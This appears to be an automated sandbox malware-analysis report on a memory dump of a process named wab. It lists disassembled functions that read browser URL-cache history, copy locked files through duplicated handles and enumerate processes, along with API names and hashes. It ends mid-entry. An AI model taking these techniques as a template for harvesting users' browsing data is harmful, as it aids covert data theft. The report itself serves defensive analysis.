                                                                                                                                                                                                                    control_flow_graph 505 40e2ab-40e2d5 call 40695d call 406b90 510 40e4a0-40e4af call 4069a3 505->510 511 40e2db-40e300 505->511 513 40e304-40e30f call 406e8f 511->513 516 40e314-40e316 513->516 517 40e476-40e483 call 406b53 516->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 516->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->513 525->510 531 40e497-40e49f ??3@YAXPAX@Z 525->531 531->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 550 40e3b0 543->550 551 40e3b3-40e3c1 wcschr 543->551 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 552 40e3fb-40e40c memcpy 549->552 553 40e40f-40e414 549->553 550->551 551->542 556 40e3c3-40e3c6 551->556 552->553 554 40e416-40e427 memcpy 553->554 555 40e42a-40e42f 553->555 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E407
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E422
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E43D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                                                                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                    • API String ID: 3073804840-2252543386
                                                                                                                                                                                                                    • Opcode ID: 096520a674a6bab575df5dbc744d04c4fa5616f7e231fb41ab5d790b95b66fc2
                                                                                                                                                                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 096520a674a6bab575df5dbc744d04c4fa5616f7e231fb41ab5d790b95b66fc2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-409248 call 40b273 call 438552 563->569 574 409383-4093ab call 40b273 call 438552 569->574 575 40924e-409258 call 4251c4 569->575 587 4093b1 574->587 588 4094ff-409502 call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 591 4093d3-4093dd call 4251c4 587->591 594 409507-40950b 588->594 598 4093b3-4093cc call 4253cf * 2 591->598 599 4093df 591->599 594->568 597 40950d-409511 594->597 597->568 601 409513-40951d call 408f2f 597->601 598->591 614 4093ce-4093d1 598->614 602 4094f7-4094fa call 424f26 599->602 601->568 602->588 611->580 613 40929f-4092a3 611->613 613->580 615 4092a9-4092ba 613->615 614->591 616 4093e4-4093fb call 4253af * 2 614->616 617 4092bc 615->617 618 4092be-4092e3 memcpy memcmp 615->618 616->602 628 409401-409403 616->628 617->618 619 409333-409345 memcmp 618->619 620 4092e5-4092ec 618->620 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->602 629 409409-40941b memcmp 628->629 629->602 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->602 634 4094b8-4094ed memcpy * 2 631->634 632->602 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->602
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                    • Opcode ID: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
                                                                                                                                                                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                    • String ID: bhv
                                                                                                                                                                                                                    • API String ID: 327780389-2689659898
                                                                                                                                                                                                                    • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                    • API String ID: 2941347001-70141382
                                                                                                                                                                                                                    • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 711 4467ac-4467b7 __setusermatherr 703->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->712 705->701 707 44674d-44674f 705->707 706->701 709 446734-44673b 706->709 710 446755-446758 707->710 709->701 713 44673d-446745 709->713 710->703 711->712 716 446810-446819 712->716 717 44681e-446825 712->717 713->710 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 726 446853-446864 GetStartupInfoW 721->726 727 44684d-446851 721->727 722->720 723->719 723->724 724->721 728 446840-446842 724->728 730 446866-44686a 726->730 731 446879-44687b 726->731 727->726 727->728 728->721 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2827331108-0
                                                                                                                                                                                                                    • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                                    • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                                                                                    • String ID: visited:
                                                                                                                                                                                                                    • API String ID: 1157525455-1702587658
                                                                                                                                                                                                                    • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 781 40e283-40e286 775->781 776->775 787 40e21b-40e21d 776->787 784 40e291-40e294 call 40aa04 781->784 785 40e288-40e290 ??3@YAXPAX@Z 781->785 784->769 785->784 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                    • API String ID: 3883404497-2982631422
                                                                                                                                                                                                                    • Opcode ID: b6600637a152ed979c2f4ee96e02f38a490db88e96d2a506738c93b3ed228158
                                                                                                                                                                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6600637a152ed979c2f4ee96e02f38a490db88e96d2a506738c93b3ed228158
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                      • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040BD2B
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 509814883-3916222277
                                                                                                                                                                                                                    • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 848 41837f-4183bf 849 4183c1-4183cc call 418197 848->849 850 4183dc-4183ec call 418160 848->850 855 4183d2-4183d8 849->855 856 418517-41851d 849->856 857 4183f6-41840b 850->857 858 4183ee-4183f1 850->858 855->850 859 418417-418423 857->859 860 41840d-418415 857->860 858->856 861 418427-418442 call 41739b 859->861 860->861 864 418444-41845d CreateFileW 861->864 865 41845f-418475 CreateFileA 861->865 866 418477-41847c 864->866 865->866 867 4184c2-4184c7 866->867 868 41847e-418495 GetLastError ??3@YAXPAX@Z 866->868 871 4184d5-418501 memset call 418758 867->871 872 4184c9-4184d3 867->872 869 4184b5-4184c0 call 444706 868->869 870 418497-4184b3 call 41837f 868->870 869->856 870->856 878 418506-418515 ??3@YAXPAX@Z 871->878 872->871 878->856
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile$??3@ErrorLast
                                                                                                                                                                                                                    • String ID: |A
                                                                                                                                                                                                                    • API String ID: 1407640353-1717621600
                                                                                                                                                                                                                    • Opcode ID: 71e54c5a76e1aa47306962d20987635381793afdf9523ab11eb51246902c22e1
                                                                                                                                                                                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71e54c5a76e1aa47306962d20987635381793afdf9523ab11eb51246902c22e1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                    • String ID: r!A
                                                                                                                                                                                                                    • API String ID: 2791114272-628097481
                                                                                                                                                                                                                    • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
